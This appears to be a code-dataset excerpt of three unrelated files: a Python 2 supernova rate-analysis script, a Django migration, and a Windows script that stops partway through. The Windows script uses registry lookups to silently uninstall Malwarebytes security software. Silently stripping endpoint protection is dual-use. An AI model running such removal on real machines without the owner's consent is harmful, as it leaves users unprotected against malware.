np.savetxt(cutsnamestr, RateTest.realcat.Catalog[(RateTest.realcat.Catalog[RateTest.ztype] < zmaxFit) & (RateTest.realcat.Catalog[RateTest.ztype] > zminFit)], delimiter = ' ', fmt = '%s')
lowzCut = zminFit
highzCut = zmaxFit
SampleSizes.append( RateTest.realcat.Catalog[(RateTest.realcat.Catalog[RateTest.ztype] < zmaxFit) & (RateTest.realcat.Catalog[RateTest.ztype] > zminFit)].shape[0])
#with open(cutsnamestr, 'rb') as f_in:
# with gzip.open(cutsnamestr + '.gz', 'wb') as f_out:
# shutil.copyfileobj(f_in, f_out)
ks.append(RateTest.k)
kErrs.append(RateTest.kErr)
if Rate_Model != 'discrete':
if Blind:
print "Blinding f"
Betas.append(RateTest.Beta+ np.cos(cosVal))
else:
Betas.append(RateTest.Beta)
BetaErrs.append(RateTest.BetaErr)
if Rate_Model == 'brokenpowerlawVar':
zBreaks.append(Rate_Fitter.zBreak)
zBreakErrs.append(Rate_Fitter.zBreakErr)
Chi2s.append(RateTest.chi2)
print "CCScale Storage Iter {0}".format(simInd)
print CCScaleStorage
if not noCCMC:
print CCScale
print CCScale[0]
if Rate_Model != 'discrete':
if np.isnan(RateTest.Beta):
nFail +=1
except Exception, e:
print "FAILURE"
print e
traceback.print_exc()
nFail +=1
#if Blind:
# Betas = np.array(Betas) + np.cos(47392945716038.134971247)
print "Number of Failures"
print nFail
if Rate_Model != 'discrete':
badSims = np.invert(np.isfinite(Betas) & (BetaErrs > 0) & np.isfinite(ks) & (kErrs > 0))
mBetas = ma.masked_array(Betas, mask=badSims)
mBetaErrs = ma.masked_array(BetaErrs, mask=badSims)
mks = ma.masked_array(ks, mask=badSims)
mkErrs = ma.masked_array(kErrs, mask=badSims)
print "mean k"
print np.nanmean(ks)
print "mean kerrs"
print np.nanmean(kErrs)
print "std. k"
print np.nanstd(ks)
print "Mean beta"
print np.nanmean(Betas)
print "Mean betaerrs"
print np.nanmean(BetaErrs)
print "std. beta"
print np.nanstd(Betas)
if len(Betas) == 1:
kmean.append(ks[0])
ksigma.append(0.0)
kErr.append(kErrs[0])
BetaMean.append(Betas[0])
BetaSigma.append(0.0)
BetaErr.append(BetaErrs[0])
else:
print "test here"
print ks
print mks
print Betas
print mBetas
print 'end test here'
kmean.append(np.average(mks, weights = 1.0/mkErrs**2))
ksigma.append(np.std(mks))
kErr.append(np.mean(mkErrs))
BetaMean.append(np.average(mBetas, weights = 1.0/mBetaErrs**2))
#BetaWeightMean.append(np.average(Betas, weights = 1.0/ma.masked_invalid(BetaErrs)**2))
#KWeightMean.append(np.average(ks, weights = 1.0/ma.masked_invalid(kErrs)**2))
BetaSigma.append(np.std(mBetas))
BetaErr.append(np.mean(mBetaErrs))
else:
print "mean f_Js"
print np.nanmean(f_JStorage, axis =0)
print "mean f_JErrs"
print np.nanmean(f_JErrStorage, axis =0)
if Rate_Model == 'brokenpowerlawVar':
zBreakMeans.append(np.nanmean(zBreaks))
zBreakSigmas.append(np.nanstd(zBreaks))
Chi2Mean.append(np.nanmean(Chi2s))
Chi2Sigma.append(np.nanstd(Chi2s))
#if simInd == 1:
print "Indiv Chi2s"
print Chi2s
bins0 = np.linspace(1.0, 20.0, 10)
hist, bins = np.histogram(Chi2s, bins = bins0)
xs = (bins[1:] + bins[:-1])/2.0
plt.bar(xs, hist, width = bins[1:] - bins[:-1])
print "Chi2 Hist"
print bins
print hist
chi2s = scipy.stats.chi2.pdf(xs, nbinsFit - 2)
norm = np.max(hist)*1.0/np.max(chi2s)
plt.plot(xs, chi2s*norm, color = 'g')
if cheatType and not cheatZ:
plt.savefig(dataname +'Chi2Plot_CheatType.png')
elif cheatZ and not cheatType:
plt.savefig(dataname +'Chi2Plot_CheatZ.png')
elif cheatZ and cheatType:
plt.savefig(dataname +'Chi2Plot_CheatTypeZ.png')
else:
plt.savefig(dataname +'Chi2Plot.png')
if not noCCMC:
print "AAA CC Scale means (weighted, unweighted)"
#print np.average(ma.masked_invalid(np.array(CCScaleStorage)),weights = 1.0/ma.masked_invalid(CCScaleErrStorage)**2, axis = 0)
#print np.nanmean(ma.masked_invalid(np.array(CCScaleStorage)), axis = 0)
#print CCScaleStorage
#print CCScaleErrStorage
print np.average(np.array(CCScaleStorage),weights = 1.0/ma.masked_invalid(CCScaleErrStorage)**2, axis = 0)
print np.nanmean(np.array(CCScaleStorage), axis = 0)
print "AAA CC Scale stds"
print np.nanstd(np.array(CCScaleStorage), axis = 0)
CCScaleStorageGlobal.append(CCScaleStorage)
print "All Betas"
print Betas
if cheatType:
print "THESE RESULTS ONLY INCLUDE TRUE Ias BECAUSE WE CHEATED AND USED THE SIM INFORMATION"
if cheatZ:
print "THESE RESULTS Use Simulated Redshift info"
'''
print "lengths of lists"
print len(RateTest.globalNDataStorage)
print len(RateTest.globalChi2Storage)
print len(RateTest.globalZPhotBinStorage)
print len(RateTest.globalNDataIaPhotBinStorage)
plt.clf()
plt.scatter(RateTest.globalNDataStorage, RateTest.globalChi2Storage)
plt.xlabel('nData')
plt.ylabel('chi2 in bin')
string = ''
if cheatType: string += 'CheatType'
if cheatZ: string += 'CheatZ'
print 'string here'
print string
plt.savefig(RateTest.realName + 'Chi2VsnData' + string +'.png')
plt.clf()
plt.scatter(RateTest.globalZPhotBinStorage, RateTest.globalChi2Storage)
plt.xlabel('zPhot bin center')
plt.ylabel('chi2 in bin')
plt.savefig(RateTest.realName + 'Chi2VsZPhot' + string +'.png')
plt.clf()
plt.clf()
plt.scatter(RateTest.globalZPhotBinStorage, RateTest.globalNDataIaPhotBinStorage, s = 1, c = 'r', label = 'Type Ia Data, zPhot')
plt.scatter(RateTest.globalZPhotBinStorage, RateTest.globalNDataCCPhotBinStorage, s = 1, c = 'b', label = 'CC Data, zPhot')
plt.scatter(RateTest.globalZTrueBinStorage, RateTest.globalNDataIaTrueBinStorage, s = 1, c = 'Pink', label = 'Type Ia Data, zTrue')
plt.scatter(RateTest.globalZTrueBinStorage, RateTest.globalNDataCCTrueBinStorage, s = 1, c = 'Cyan', label = 'CC Data, zTrue')
plt.yscale('log')
plt.xlabel('redshift either true or phot')
plt.legend()
plt.savefig(RateTest.realName + 'AggregateZDistro' + string +'.png')
'''
#print "MURES CUTS"
#print MURES_Cuts
print "Frac Contam Cuts"
print fracContamCuts
if Rate_Model != 'discrete':
print "Kmeans"
print kmean
print "Ksigmas"
print ksigma
print "BetaMeans"
print BetaMean
print "BetaSigmas"
print BetaSigma
print "BetaErrs"
print BetaErr
else:
print "f_J mean unweighted"
print np.mean(f_JStorage, axis = 0)
print "f_J mean weighted"
print np.average(f_JStorage, weights = 1.0/(np.array(f_JErrStorage))**2, axis = 0)
print "f_J Errors"
print np.mean(f_JErrStorage, axis = 0)
if Rate_Model == 'brokenpowerlawVar':
print "mean powerlaw break z"
print zBreakMeans
print "st. dev powerlaw break z"
print zBreakSigmas
print "Chi2Means"
print Chi2Mean
print "Chi2Sigma"
print Chi2Sigma
assert(fracContamCuts[0] == -1)
outfile = dataname
if Rate_Model != 'discrete':
print "outfile Pre Prefix"
print outfile
if cheatType:
outfile = outfile + '_CheatType'
if cheatZ:
outfile = outfile + 'Z'
elif cheatZ:
outfile = outfile + '_CheatZ'
outfile1 = outfile + '.txt'
outfile2 = outfile + '-IndivBetaK.txt'
output2 = open(outfile2, 'w')
output2.write('i Beta_i k_i BetaErr_i kErr_i\n')
for i, b, k, berr, kerr in zip(range(len(Betas)),Betas, ks, BetaErrs, kErrs):
output2.write('{0} {1:.4f} {2:.4f} {3:.4f} {4:.4f}\n'.format(i, b, k, berr, kerr))
output2.close()
print "Outfile Name"
if not(os.path.isfile(outfile1)):
output = open(outfile1, 'w')
output.write('#Date Date/time at which job finished\n')
output.write('#DataBeta Input beta for the simulated data sample. Will be 0.0 for real data.\n')
output.write('#N_sims Number of datalike sims that go into the subsequent means\n')
output.write('#SampleSize Mean Number of Events in data post cut\n')
output.write('#delta_Beta mean difference between large MC sim beta (2.11 for the time being) and the measured beta for the data (not the beta in column 2.\n')
output.write('#sigma_Beta stdev of delta_Beta over N_sims sims\n')
output.write('#BetaStdErr std. error in the mean of delta_Beta over N_sims sims\n')
output.write('#Beta_err mean statistical error on beta\n')
output.write('#K mean ratio between large MC sim K (1.7E-5 for the time being) and the measured K for the data \n')
output.write('#sigma_K stdev of K over N_sims sims\n')
output.write('#KStdErr std. error in the mean of K over N_sims sims\n')
output.write('#KStaterr mean statistical error on K\n')
output.write('#meanZ mean photoZ of the large MC sim\n')
output.write('#sigmaZ std. deviation of the photoZs for the large Sim\n')
output.write('#sigmaDZ std. deviation of (zSim - zPHOT)\n')
output.write('#NCC/NTotScaled overall CC Contamination after adjusting CC Frac to data\n')
output.write('#NCC/NTot overall CC Contamination in sim only\n')
output.write('#CCScales relative sim vs. CC rate in z-bins \n')
output.write('#TypeChoice Internal Diagnostic, check code comments\n')
output.write('#NNProbCut Threshold for NN probability of Ia\n')
output.write('#NBins Number of Analysis Bins\n')
output.write('#MRSLow Threshold for Neg Mures Outliers\n')
output.write('#MRSHigh Threshold for Pos Mures Outliers\n')
output.write('#FitprobCut Lowest Fitprob in sim\n')
output.write('#MRSCut NSigma Hubble residual cut\n')
output.write('#Chi2 minimum value of Chi2 function\n')
output.write('#Correlation cov[0,1]/np.sqrt(cov[0,0]*cov[1,1])\n')
output.write('#Date \t\tDataBeta N_sims SampleSize delta_Beta sigma_Beta BetaStdErr BetaStatErr K sigma_K KStdErr KStatErr meanZ sigmaZ sigmaDz NCC/NTotScaled NCC/NTot CCScales TypeChoice NNProbCut NBins MRSLow MRSHigh FitprobCut MRSCut Chi2 Correlation\n')
else:
output = open(outfile1, 'a')
print 'outfile'
print outfile
cat = RateTest.simcat.Catalog
t = time.strftime('%b-%d-%H:%M')
N_Sims = np.sum(np.invert(np.isnan(ks)))
SigBeta = float(BetaSigma[0])
SigK = float(ksigma[0])
kStdErr = float(ksigma[0])/np.sqrt(N_Sims)
BetaStdErr = float(BetaSigma[0])/np.sqrt(N_Sims)
meanZ = np.nanmean(cat[RateTest.ztype])
sigZ = np.nanstd(cat[RateTest.ztype])
sigDZ = np.nanstd(cat[RateTest.ztype] - cat['SIM_ZCMB'])
lowzCut = zminFit
highzCut = zmaxFit
contam2 = np.sum(cat[(cat[RateTest.ztype] > lowzCut) & (cat[RateTest.ztype] < highzCut)]['SIM_TYPE_INDEX'] !=1).astype(float)/ float(cat[(cat[RateTest.ztype] > lowzCut) & (cat[RateTest.ztype] < highzCut)].shape[0])
contam = RateTest.fracCCDataTot
ccscales = np.average(np.array(CCScaleStorage),weights = 1.0/ma.masked_invalid(CCScaleErrStorage)**2, axis = 0)
cov = RateTest.covar
correlation = cov[0, 1] / np.sqrt(cov[0, 0] * cov[1, 1])
print "Outfile debug"
print t
print trueBeta
print N_Sims
print BetaMean[0]
print BetaStdErr
print BetaErrs[0]
print meanZ
print sigZ
print sigDZ
print contam
print RateTest.typeString
print RateTest.postCutSimCat['NN_PROB_IA'].min()
print SigBeta
print kmean[0]
print kErrs[0]
print kStdErr
print SigK
print np.nanmean(SampleSizes)
print int(nbinsFit)
print ScaleMuResCutLow
print ScaleMuResCutHigh
print RateTest.postCutSimCat['FITPROB'].min()
print MURESCuts
print np.mean(Chi2Mean)
print contam2
print ccscales
print correlation
ccscales = ','.join(str(ccscales).split())
output.write('{0}\t\t{1:.2f}\t{2}\t{17:.3f}\t{3:.3f}\t{12:.3f}\t{4:.3f}\t{5:.3f}\t{13:.3f}\t{14:.3f}\t{15:.3f}\t{16:.3f}\t{6:.3f}\t{7:.3f}\t{8:.3f}\t{9:.3f}\t{24:.3f}\t{25}\t{10}\t{11:.3f}\t{18:d}\t{19:.3f}\t{20:.3f}\t{21:.3f}\t{22:.2f}\t{23:.3f}\t{26:.3f}\n'.format(t, trueBeta, N_Sims, BetaMean[0], BetaStdErr, BetaErrs[0],meanZ, sigZ, sigDZ, contam, RateTest.typeString, RateTest.postCutSimCat['NN_PROB_IA'].min(), SigBeta, kmean[0], kErrs[0], kStdErr, SigK, np.nanmean(SampleSizes), int(nbinsFit), ScaleMuResCutLow, ScaleMuResCutHigh, RateTest.postCutSimCat['FITPROB'].min(), MURESCuts, np.mean(Chi2Mean), contam2, ccscales, correlation) )
print "BetaMean[0]"
print BetaMean[0]
print BetaMean
print "KMean[0]"
print kmean[0]
print kmean
print "Correlation"
print correlation
#print "BetaWeightMean[0]"
#print BetaWeightMean[0]
#print BetaWeightMean
#print "KWeightMean[0]"
#print KWeightMean[0]
#print KWeightMean
if not noCCMC:
print "Individual Scales"
print CCScaleStorage
print "Individual ScaleErrs"
print CCScaleErrStorage
print "average ScaleErrs"
print np.nanmean(CCScaleErrStorage)
print "AAA CC Scale means (weighted, unweighted)2"
print np.average(ma.masked_invalid(np.array(CCScaleStorage)), weights = 1.0/ma.masked_invalid(CCScaleErrStorage)**2)
print np.nanmean(ma.masked_invalid(np.array(CCScaleStorage)))
print "AAA CC Scale stds"
print np.nanstd(np.array(CCScaleStorage))
if simInd == 1:
plt.clf()
hist, bins = np.histogram(CCScaleStorage, bins = np.linspace(0.0, 5.0, 10))
plt.step((bins[1:]+bins[:-1])/2.0, hist, where = 'mid', c = 'g')
plt.savefig(dataname + 'ScaleDistro.png')
plt.clf()
print "nIter"
print nIter
if not (priorRate is None):
kPriorPlots = np.linspace(0.8, 1.5, 300)
kPriors = []
for ktemp in kPriorPlots:
kPriors.append(ratePrior(ktemp*trueMCK, BetaMean[0]*trueMCBeta, priorRate, priorZEff, priorRateErrUp = ratePriorErrUp, priorRateErrDown = ratePriorErrDown, priorRateErrAll = ratePriorErrAll))
betaPriorPlots = np.linspace(-0.5, 0.5, 300)
betaPriors = []
for btemp in betaPriorPlots:
betaPriors.append(ratePrior(kmean[0]*trueMCK, b*trueMCBeta, priorRate, priorZEff, priorRateErrUp = ratePriorErrUp, priorRateErrDown = ratePriorErrDown, priorRateErrAll = ratePriorErrAll))
actualPrior = ratePrior(kmean[0]*trueMCK, BetaMean[0]*trueMCBeta, priorRate, priorZEff, priorRateErrUp = ratePriorErrUp, priorRateErrDown = ratePriorErrDown, priorRateErrAll = ratePriorErrAll)
kPriors = np.array(kPriors)
betaPriors = np.array(betaPriors)
plt.clf()
plt.figure()
plt.plot(kPriorPlots, np.log10(kPriors) )
plt.hlines(np.log10(actualPrior), kPriorPlots[0], kPriorPlots[-1], label = 'Best Fit Prior = {0:.03f}'.format(actualPrior))
plt.vlines(kmean[0], np.log10(kPriors).min(), np.log10(kPriors).max(), label = 'Best Fit K = {0:.03f}'.format(kmean[0]))
plt.xlabel('k')
plt.ylabel('ratePrior')
plt.legend()
plt.savefig(dataname + '_LogKPriorPlot.png')
plt.clf()
plt.figure()
plt.plot(kPriorPlots, kPriors)
plt.hlines(actualPrior, kPriorPlots[0], kPriorPlots[-1], label = 'Best Fit Prior = {0:.03f}'.format(actualPrior))
plt.vlines(kmean[0], kPriors.min(), kPriors.max(), label = 'Best Fit K = {0:.03f}'.format(kmean[0]))
plt.xlabel('k')
plt.ylabel('ratePrior')
plt.legend()
plt.savefig(dataname + '_KPriorPlot.png')
plt.clf()
plt.figure()
plt.plot(betaPriorPlots, betaPriors)
plt.hlines(actualPrior, betaPriorPlots[0], betaPriorPlots[-1], label = 'Best Fit Prior = {0:.03f}'.format(actualPrior))
plt.vlines(BetaMean[0], betaPriors.min(), betaPriors.max(), label = 'Best Fit Beta = {0:.03f}'.format(BetaMean[0]))
plt.xlabel('beta')
plt.ylabel('ratePrior')
plt.legend()
plt.savefig(dataname + '_BetaPriorPlot.png')
'''
argList = ''
minObjList = ''
chi2Initargs = ''
for i in xrange(zCenters.shape[0]):
argList += 'f{0},'.format(i)
minObjList += 'f{0} = 1.0, error_f{0} = 0.1, limit_f{0} = (0.0, None),'.format(i)
chi2Initargs += '1.0,'
argList = argList[:-1]
minObjList = minObjList[:-1]
chi2Initargs = chi2Initargs[:-1]
#print argList
#print minObjList
#print chi2Initargs
exec('''
'''
def chi2func(nData, nSim, effmat, fnorm, zCenters, {0}, dump = False, complexdump = False):
Chi2Temp = 0.0
f_Js = [{0}]
chi2Mat = np.zeros((self.nbins))
adjNMC = np.zeros((self.nbins))
#print f_Js
#Check if I am scaling errors down with increasing MC size. Make MC twice as large as "Data" to test.
for row, nDataI, i in zip(effmat, nData, xrange(self.nbins)):
#if dump:
# print "nDataI"
# print nDataI
JSumTemp = 0.0
for eff, nSimJ, f_J, j in zip(row, nSim, f_Js, xrange(self.nbins)):
JSumTemp += nSimJ*f_J*eff*fnorm
if dump and i == j:
print "nDataI"
print nDataI
print "Bin Contribution to scaled nSim"
print nSimJ*f_J*eff*fnorm
#print "Product of nSimJ, f_J, eff, fnorm"
#print nSimJ
#print f_J
#print eff
#print fnorm
if nDataI > 1E-11 or JSumTemp > 1E-11:
if dump and i == j:
print "nDataI"
print nDataI
print "scaled nSim"
print JSumTemp
print "fnorm"
print fnorm
print "error"
print nDataI + JSumTemp*fnorm
if (nDataI + JSumTemp*fnorm) <= 0:
print (nDataI + JSumTemp*fnorm)
assert(0)
Chi2Temp += ((nDataI - JSumTemp)**2/(nDataI + JSumTemp*fnorm))#*fnorm**2
return Chi2Temp
''''''.format(argList), locals())
fnorm = float(np.sum(nData))/float(self.simcat.Catalog['zPHOT'].shape[0])
#print type(chi2func)
#print 'lamChi2 = lambda {0}: chi2func(nData, nSim, self.effmat, fnorm, zCenters, {0})'.format(argList)
exec('lamChi2 = lambda {0}: chi2func(nData, nSim, self.effmat, fnorm, zCenters, {0})'.format(argList),locals())
exec('lamChi2Dump = lambda {0}: chi2func(nData, nSim, self.effmat, fnorm, zCenters, {0}, dump = True)'.format(argList),locals())
#print type(lamChi2)
#print type(lamChi2Dump)
#print 'MinObj = M(lamChi2, {0})'.format(minObjList)
exec('MinObj = M(lamChi2, {0})'.format(minObjList),locals())
exec('chi2Init = lamChi2Dump({0})'.format(chi2Initargs),locals())
#print "Chi2 init = {0}".format(round(chi2Init, 4))
MinObj.set_strategy(2)
MinObj.migrad()
#MinObj.minos()
zCenters = (simBins[1:] + simBins[:-1])/2.0
print MinObj.values
fJs = []
fJErrs = []
for v in MinObj.values.keys():
fJs.append(MinObj.values[v])
fJErrs.append(MinObj.errors[v])
exec('lamChi22 = lambda k, Beta: self.chi2V2(fJs, fJErrs, zCenters, k, Beta)',locals())
exec('MinObj2 = M(lamChi22, k = 1.0, error_k = 0.1, limit_k = (0.0, None), Beta = 0.0, error_Beta = 0.1)',locals())
#print "Large Perfect Sim {0}".format(simInd)
#print "Sim R0 = 1.7E-5; Sim Beta = 4.2"
##print "Sim Beta = 1.5; Data Beta = 1.5"
##RateTest = Rate_Fitter('DES_FULLSURVEY_TEST/JLDESFULLSURVEYIaOnly+zPHOT+smearC11/FITOPT000+SALT2mu.FITRES', 'JLDESFULLSURVEYIaOnly+zPHOT+smearC11','JLDES_R0_7E-5_Beta_1-5_Shallow/JLDES_R0_7E-5_Beta_1-5_Shallow/FITOPT000+SALT2mu.FITRES', 'JLDES_R0_7E-5_Beta_1-5_Shallow','/project/rkessler/SN/SNDATA_ROOT/SIM/JLDES_R0_7E-5_Beta_1-5_Shallow/JLDES_R0_7E-5_Beta_1-5_Shallow.DUMP')
#print '/project/rkessler/jlasker/Rate_Analysis/TestSameK2Beta/outFit_datasize/JLDES_R0_1-7E-5_Beta_4-2_Datasize_Perfect-00{0:02d}/FITOPT000.FITRES'.format(simInd)
#RateTest = Rate_Fitter('/project/rkessler/jlasker/Rate_Analysis/TestSameK2Beta/outFit_datasize/JLDES_R0_1-7E-5_Beta_4-2_Datasize_Perfect-00{0:02d}/FITOPT000.FITRES'.format(simInd), 'TestSameK2Beta/JLDES_R0_1-7E-5_Beta_4-2-00{0:02d}'.format(simInd),'/project/rkessler/jlasker/Rate_Analysis/outFit_datalike/JLDES_R0_1-7E-5_Beta_2-1_Datalike_PERFECT/FITOPT000.FITRES', 'JLDES_R0_1-7E-5_Beta_2-1_DataLikePhotZ','/scratch/midway2/rkessler/SNDATA_ROOT/SIM/JLDES_R0_1-7E-5_Beta_2-1_Datalike_PERFECT/JLDES_R0_1-7E-5_Beta_2-1_Datalike_PERFECT.DUMP', 2.1, zmin = 0.1, zmax = 1.3)# , MJDMin = 0, MJDMax = np.inf)
#RateTest.effCalc(nbins = 12)
##RateTest.effCalc(nbins = 20)
#RateTest.fit_rate()
#ksPerf.append(RateTest.k)
#kErrsPerf.append(RateTest.kErr)
#BetasPerf.append(RateTest.Beta)
#BetaErrsPerf.append(RateTest.BetaErr)
#print "Sim Beta = 1.5; Data Beta = 1.5"
#RateTest = Rate_Fitter('DES_FULLSURVEY_TEST/JLDESFULLSURVEYIaOnly+zPHOT+smearC11/FITOPT000+SALT2mu.FITRES', 'JLDESFULLSURVEYIaOnly+zPHOT+smearC11','JLDES_R0_7E-5_Beta_1-5_Shallow/JLDES_R0_7E-5_Beta_1-5_Shallow/FITOPT000+SALT2mu.FITRES', 'JLDES_R0_7E-5_Beta_1-5_Shallow','/project/rkessler/SN/SNDATA_ROOT/SIM/JLDES_R0_7E-5_Beta_1-5_Shallow/JLDES_R0_7E-5_Beta_1-5_Shallow.DUMP')
try:
optfname = argv[1]
opts = open(optfname, 'r')
optlist = opts.readlines()
zmin = None; zmax = None; MJDMin = None; MJDMax = None; bins = None; runFit = None
for opt in optlist:
try:
optName, optVal = opt.split()
except:
print "{0} not formatted correctly".format(opt)
continue
if (optName.lower() == 'zmin') & (not zmin): zmin = optVal
if (optName.lower() == 'zmax') & (not zmax): zmax = optVal
if (optName.lower() == 'mjdmin') & (not MJDMin): MJDMin = optVal
if (optName.lower() == 'mjdmax') & (not MJDMax): MJDMax = optVal
if (optName.lower() == 'bins') & (not bins): zmin = optVal
if (optName.lower() == 'runfit') & (not runFit == None): zmin = optVal
if zmin == None: zmin = 0.1
if zmax == None: zmax = 1.2
if MJDMin == None: MJDMin = 0.0
if MJDMax == None: MJDMax = np.inf
if bins == None: bins = "equalSize"
if runFit == None: runFit = True
except:
print "Option File not working/Nonexistent. Using default values"
''' |
7,132 | b6a0a49e05fbc0ac7673d6c9e8ca4d263c8bb5cd | # Generated by Django 2.2.17 on 2020-12-05 07:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('service', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='identification',
name='id_card_img',
field=models.ImageField(blank=True, null=True, upload_to='images/img_card/'),
),
migrations.AlterField(
model_name='identification',
name='selfie_img',
field=models.ImageField(blank=True, null=True, upload_to='images/img_selfie/'),
),
]
|
7,133 | a444e215b64b3a2d7f736e38227b68c1a1b952a0 | import os
import platform
import _winreg
def gid(x):
find=x
winreg = _winreg
REG_PATH1 = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
REG_PATH2 = r"SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall"
registry_key = winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, REG_PATH1, 0, winreg.KEY_READ)
winreg.CloseKey(registry_key)
name = []
string=[]
registry_key = winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, REG_PATH1, 0, winreg.KEY_READ)
i=0
while True:
try:
sub_registry_key = winreg.EnumKey(registry_key, i)
newpath1 = REG_PATH1 + '\\' + sub_registry_key
new_registry_key = winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, newpath1, 0, winreg.KEY_READ)
try:
DisplayName, getname = winreg.QueryValueEx(new_registry_key, 'DisplayName')
UninstallString, getname = winreg.QueryValueEx(new_registry_key, 'UninstallString')
winreg.CloseKey(new_registry_key)
name.append(DisplayName)
string.append( UninstallString )
except:
pass
i += 1
except:
break
registry_key1 = winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, REG_PATH2, 0, winreg.KEY_READ)
ii=0
while True:
try:
sub_registry_key1 = winreg.EnumKey(registry_key1, ii)
newpath2 = REG_PATH2 + '\\' + sub_registry_key1
new_registry_key1 = winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, newpath2, 0, winreg.KEY_READ)
try:
DisplayName1, getname = winreg.QueryValueEx(new_registry_key1, 'DisplayName')
DisplayVersion1, getname = winreg.QueryValueEx(new_registry_key1, 'DisplayVersion')
UninstallString1, getname = winreg.QueryValueEx(new_registry_key1, 'UninstallString')
winreg.CloseKey(new_registry_key1)
name.append(DisplayName1)
string.append(UninstallString1 )
except:
pass
ii += 1
except:
break
try:
registry_key2 = winreg.OpenKey( winreg.HKEY_CURRENT_USER, REG_PATH1, 0, winreg.KEY_READ)
iii=0
while True:
try:
sub_registry_key2 = winreg.EnumKey(registry_key2, iii)
newpath3 = REG_PATH1 + '\\' + sub_registry_key2
new_registry_key2 = winreg.OpenKey( winreg.HKEY_CURRENT_USER, newpath3, 0, winreg.KEY_READ)
try:
DisplayName2, getname = winreg.QueryValueEx(new_registry_key2, 'DisplayName')
UninstallString2, getname = winreg.QueryValueEx(new_registry_key2, 'UninstallString')
winreg.CloseKey(new_registry_key2)
name.append( DisplayName2)
string.append(UninstallString2 )
except:
pass
iii += 1
except:
break
except:
pass
try:
registry_key3 = winreg.OpenKey( winreg.HKEY_CURRENT_USER, REG_PATH2, 0, winreg.KEY_READ)
iiii=0
while True:
try:
sub_registry_key3 = winreg.EnumKey(registry_key3, iiii)
newpath4 = REG_PATH2 + '\\' + sub_registry_key3
new_registry_key3 = winreg.OpenKey( winreg.HKEY_CURRENT_USER, newpath4, 0, winreg.KEY_READ)
try:
DisplayName3, getname = winreg.QueryValueEx(new_registry_key3, 'DisplayName')
UninstallString3, getname = winreg.QueryValueEx(new_registry_key3, 'UninstallString')
winreg.CloseKey(new_registry_key3)
name.append( DisplayName3 )
string.append(UninstallString3 )
except:
pass
iiii += 1
except:
break
except:
pass
out={}
for i in name:
if find.lower() in i.lower():
x=i
for k,v in zip(name,string):
out[k] = v
x1=out[x]
if x1:
cmd=x1+' /quiet REBOOT=ReallySuppress REMOVE=ALL'
os.popen(cmd).read()
def uni():
arch=platform.machine()
if 'AMD64' in arch:
if os.path.exists(os.environ['PROGRAMFILES(X86)']):
if os.path.exists(os.path.join(os.environ['PROGRAMFILES(X86)'],"Malwarebytes' Anti-Malware")):
os.chdir(os.path.join(os.environ['PROGRAMFILES(X86)'],"Malwarebytes' Anti-Malware"))
print "\n\t*)Malwarebytes Anti-Malware Uninstallation started......"
out=os.popen("unins000.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART").read()
print(out)
if os.path.exists(os.path.join(os.environ['PROGRAMFILES(X86)'],"Malwarebytes Anti-Malware")):
os.chdir(os.path.join(os.environ['PROGRAMFILES(X86)'],"Malwarebytes Anti-Malware"))
print "\n\t*)Malwarebytes Anti-Malware Uninstallation started......"
out=os.popen("unins000.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART").read()
print(out)
else:
if os.path.exists(os.environ['PROGRAMFILES']):
if os.path.exists(os.path.join(os.environ['PROGRAMFILES'],"Malwarebytes' Anti-Malware")):
print "\n\t*)Malwarebytes Anti-Malware Uninstallation started......"
os.chdir(os.path.join(os.environ['PROGRAMFILES'],"Malwarebytes' Anti-Malware"))
out=os.popen("unins000.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART").read()
print(out)
if os.path.exists(os.path.join(os.environ['PROGRAMFILES'],"Malwarebytes Anti-Malware")):
os.chdir(os.path.join(os.environ['PROGRAMFILES'],"Malwarebytes Anti-Malware"))
print "\n\t*)Malwarebytes Anti-Malware Uninstallation started......"
out=os.popen("unins000.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART").read()
print(out)
def uni2():
arch=platform.machine()
if 'AMD64' in arch:
if os.path.exists(os.environ['PROGRAMFILES(X86)']):
if os.path.exists(os.path.join(os.environ['PROGRAMFILES(X86)'],"Malwarebytes Anti-Exploit")):
print "\n\t*)Malwarebytes Anti-Exploit Uninstallation started......"
os.chdir(os.path.join(os.environ['PROGRAMFILES(X86)'],"Malwarebytes Anti-Exploit"))
out=os.popen("unins000.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART").read()
print(out)
else:
if os.path.exists(os.environ['PROGRAMFILES']):
if os.path.exists(os.path.join(os.environ['PROGRAMFILES'],"Malwarebytes Anti-Exploit")):
os.chdir(os.path.join(os.environ['PROGRAMFILES'],"Malwarebytes Anti-Exploit"))
print "\n\t*)Malwarebytes Anti-Exploit Uninstallation started......"
out=os.popen("unins000.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART").read()
print(out)
def uni3():
if os.path.exists(os.environ['PROGRAMFILES']):
if os.path.exists('C:\Program Files\Malwarebytes\Anti-Malware'):
os.chdir('C:\Program Files\Malwarebytes\Anti-Malware')
print "\n\t*)Malwarebytes Uninstallation started......"
out=os.popen("unins000.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART").read()
print(out)
else:
print "\n\t*)Malwarebytes path not found..."
def uni4():
import os
import _winreg
import re
def check():
inst=os.popen("wmic product get name,identifyingnumber").read()
return inst
def reg():
blacklist=r"Malwarebytes' Managed Client"
def collectprograms(rtkey,pK,kA):
try:
list=[]
oK=_winreg.OpenKey(rtkey,pK,0,kA)
i=0
while True:
try:
bkey=_winreg.EnumKey(oK,i)
vkey=os.path.join(pK,bkey)
oK1=_winreg.OpenKey(rtkey,vkey,0,kA)
try:
DN,bla=_winreg.QueryValueEx(oK1,'DisplayName')
inlist=[DN.strip(), vkey, pK]
list.append(inlist)
except:
pass
i+=1
except:
break
except:
pass
return list
uninstallkey_32='SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'
if 'PROGRAMFILES(X86)' in os.environ.keys():
